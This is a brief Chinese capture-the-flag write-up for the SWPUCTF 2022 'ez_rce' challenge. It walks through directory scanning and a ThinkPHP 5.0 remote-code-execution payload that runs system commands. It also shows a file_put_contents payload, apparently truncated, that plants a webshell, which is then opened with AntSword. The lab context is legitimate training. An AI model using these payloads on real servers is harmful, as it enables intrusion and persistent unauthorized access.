第一周1

题解 :[SWPUCTF 2022 新生赛]ez_rce
打开这个题目 发现什么也没有

  1. 这个时候可以用dirsearch -u “网址” 来看一下该网址的文件和目录
    发现robotx.txt文件 我们打开看一下
    发现提示NSS/index.php/

  2. 我们把NSS/index.php/这个路径输上去
    发现弹出来Think.php 5.0 由此我们可以联想到Think.php 5.0 漏洞

  3. 我们在网上找一下 https://img2020.cnblogs.com/blog/1863419/202112/1863419-20211224202858742-1691585409.png
    该网址是这个漏洞的利用方式

  4. s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /

    bin boot dev etc flag home lib lib64 media mnt nss opt proc root run sbin srv sys tmp usr var var 好熟悉的界面 似曾相识啊

    发现flag 我们把这个ls /换为cat /flag
    发现啥也没有

  5. 这个时候就感觉可能是套娃了 我选择构造文件来看看
    payload :s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=eval.php&vars[1][]=

  6. 我们打开中国蚁剑 路径为:
    NSS/eval.php 密码为 cmd
    发现连接成功
    发现flag
    这个题也太坑了 真的是套娃 真的flag在nss/ctf/flag/flag路径下
    7.总结:
    发现页面啥也没有时 可以用dirsearch工具进行 网站目录和文件的扫描 一般可疑文件:robots.txt index.php flag.php
    如何出现flag但打开发现没有时 我们可以选择构造文件上传到该网站当前的目录下
    最终找到真的flag